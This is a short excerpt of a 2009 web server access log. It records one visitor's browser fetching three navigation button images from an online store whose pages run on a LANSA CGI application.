76.114.150.150 - - [12/Jun/2009:01:01:44 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:44 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.114.150.150 - - [12/Jun/2009:01:01:44 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1021B0455002D400122F030+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
